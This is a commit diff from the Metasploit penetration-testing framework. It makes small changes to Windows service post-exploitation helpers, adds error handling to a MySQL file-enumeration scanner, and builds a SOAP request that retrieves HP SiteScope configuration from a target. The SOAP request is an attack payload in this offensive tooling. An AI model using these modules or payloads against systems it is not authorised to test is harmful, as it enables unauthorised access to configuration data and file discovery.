rapid7 · jvazquez-r7 · Jul 30, 2013 · Jul 30, 2013 · Jul 30, 2013 · Jul 30, 2013
diff --git a/data/exploits/CVE-2012-1535/Main.swf b/data/exploits/CVE-2012-1535/Main.swf
diff --git a/lib/msf/core/post/windows/services.rb b/lib/msf/core/post/windows/services.rb
@@ -180,7 +180,7 @@ def service_change_startup(name,mode)
 	def service_create(name, display_name, executable_on_host, startup=2, server=nil)
 		adv = session.railgun.advapi32
 
-		# SC_MANAGER_CONNECT	       0x01
+		# SC_MANAGER_CONNECT           0x01
 		# SC_MANAGER_CREATE_SERVICE    0x02
 		# SC_MANAGER_QUERY_LOCK_STATUS 0x10
 		open_sc_manager(:host=>server, :access=>0x13) do |manager|
@@ -292,7 +292,7 @@ def service_delete(name, server=nil)
 			# Now to grab a handle to the service.
 			# Thank you, Wine project for defining the DELETE constant since it,
 			# and all its friends, are missing from the MSDN docs.
-			# #define DELETE		     0x00010000
+			# #define DELETE                     0x00010000
 			handle = adv.OpenServiceA(manager, name, 0x10000)
 			if (handle["return"] == 0)
 				raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
@@ -306,51 +306,6 @@ def service_delete(name, server=nil)
 			handle["GetLastError"]
 		end
 	end
-
-	#
-	# Query Service Status
-	#
-	# @param (see #service_start)
-	#
-	# @return {} representing lpServiceStatus
-	#
-	# @raise (see #service_start)
-	#
-	#
-	def service_status(name, server=nil)
-		adv = session.railgun.advapi32
-		ret = nil
-
-		# 0x80000000 GENERIC_READ
-		open_sc_manager(:host=>server, :access=>0x80000000) do |manager|
-			# Now to grab a handle to the service.
-			handle = adv.OpenServiceA(manager, name, 0x80000000)
-			if (handle["return"] == 0)
-				raise RuntimeError.new("Could not open service. OpenServiceA error: #{handle["GetLastError"]}")
-			end
-
-			status = adv.QueryServiceStatus(handle["return"],28)
-			if (status["return"] == 0)
-				raise RuntimeError.new("Could not query service. QueryServiceStatus error: #{handle["GetLastError"]}")
-			end
-
-			vals = status['lpServiceStatus'].unpack('L*')
-
-			adv.CloseServiceHandle(handle["return"])
-
-			ret = { :type=>		     vals[0],
-				:state=>	     vals[1],
-				:controls_accepted=> vals[2],
-				:win32_exit_code=>   vals[3],
-				:service_exit_code=> vals[4],
-				:check_point=>	     vals[5],
-				:wait_hint=>	     vals[6],
-			}
-
-		end
-
-		return ret
-	end
 end
 
 end

diff --git a/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb b/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb
@@ -27,10 +27,6 @@ class Def_advapi32
 	def self.create_dll(dll_path = 'advapi32')
 		dll = DLL.new(dll_path, ApiConstants.manager)
 
-		dll.add_function('QueryServiceStatus', 'DWORD', [
-				['LPVOID', 'hService', 'in'],
-				['PBLOB', 'lpServiceStatus', 'out']])
-
 		dll.add_function('CredEnumerateA', 'BOOL', [
 				['PCHAR', 'Filter', 'in'],
 				['DWORD', 'Flags', 'in'],

diff --git a/modules/auxiliary/admin/http/github_pulls_changes.rb b/modules/auxiliary/admin/http/github_pulls_changes.rb
diff --git a/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb b/modules/auxiliary/scanner/http/hp_sitescope_getsitescopeconfiguration.rb
@@ -75,7 +75,22 @@ def run_host(ip)
 	end
 
 	def access_configuration
-		print_status("#{rhost}:#{rport} - Connecting to SiteScope SOAP Interface")
+
+		data = "<?xml version='1.0' encoding='UTF-8'?>" + "\r\n"
+		data << "<wsns0:Envelope" + "\r\n"
+		data << "xmlns:wsns1='http://www.w3.org/2001/XMLSchema-instance'" + "\r\n"
+		data << "xmlns:xsd='http://www.w3.org/2001/XMLSchema'" + "\r\n"
+		data << "xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'" + "\r\n"
+		data << ">" + "\r\n"
+		data << "<wsns0:Body" + "\r\n"
+		data << "wsns0:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/'" + "\r\n"
+		data << ">" + "\r\n"
+		data << "<impl:getSiteScopeConfiguration" + "\r\n"
+		data << "xmlns:impl='http://Api.freshtech.COM'" + "\r\n"
+		data << "></impl:getSiteScopeConfiguration>" + "\r\n"
+		data << "</wsns0:Body>" + "\r\n"
+		data << "</wsns0:Envelope>"
+
 		print_status("#{@peer} - Retrieving the SiteScope Configuration")
 
 		uri = normalize_uri(@uri, 'services/APISiteScopeImpl')
@@ -88,6 +103,7 @@ def access_configuration
 			'headers'  => {
 				'SOAPAction'    => '""',
 		}})
+
 		if res and res.code == 200
 
 			if res.headers['Content-Type'] =~ /boundary="(.*)"/

diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb
@@ -109,7 +109,26 @@ def check_dir dir
 				:proto => 'tcp',
 				:update => :unique_data
 			)
+		rescue ::RbMysql::ServerError
+			vprint_warning("#{peer} - #{dir} does not exist")
+		rescue ::RbMysql::Error => e
+			vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}")
+			return
+		rescue Rex::ConnectionTimeout => e
+			vprint_error("#{peer} - Timeout: #{e.message}")
+			return
+		else
+			print_good("#{peer} - #{dir} is a file and exists")
+			report_note(
+				:host  => rhost,
+				:type  => "filesystem.file",
+				:data  => "#{dir} is a file and exists",
+				:port  => rport,
+				:proto => 'tcp',
+				:update => :unique_data
+			)
 		end
+
 		return
 	end
 

diff --git a/modules/auxiliary/scanner/ntp/ntp_readvar.rb b/modules/auxiliary/scanner/ntp/ntp_readvar.rb
@@ -67,4 +67,3 @@ def run_host(ip)
 	end
 
 end
-
diff --git a/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_add_user_and_add_role.rb b/modules/auxiliary/scanner/sap/sap_ctc_verb_tampering_add_user_and_add_role.rb